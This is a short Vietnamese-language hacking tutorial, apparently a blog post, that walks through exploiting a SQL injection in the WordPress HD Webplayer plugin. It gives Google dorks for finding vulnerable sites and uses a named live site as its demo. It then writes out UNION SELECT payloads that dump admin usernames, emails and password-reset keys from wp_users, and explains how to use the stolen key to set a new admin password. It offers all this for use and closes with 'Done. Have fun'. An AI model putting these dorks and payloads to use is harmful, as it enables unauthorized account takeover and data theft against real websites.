inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Ví dụ demo: http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
Site này fix rồi nhé ae khỏi thử =))
Ta thêm dấu ' sau số video id để check lỗi
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3'
=> Dính rồi :))
Khai thác tiếp. sau khi order by thì xác định được 11 tables. Ta querry tiếp
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Vậy là ta đã lấy được username và email của admin. các bạn lưu lại email sau đó truy cập trang login.
http://www.thefreenudecelebritysite.com/wp-login.php
Bấm vào "Lost your password"
Điền email của admin vào
- Tiếp tục querry
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users-
Tiếp theo ta vào: wp-login.php?action=rp&key=resetkey&login=username
Nhớ thay 2 giá trị resetkey và username bằng các giá trị đã lấy được
Nhập mất khẩu mới vô
Done. Have fun
Đăng nhận xét Blogger Facebook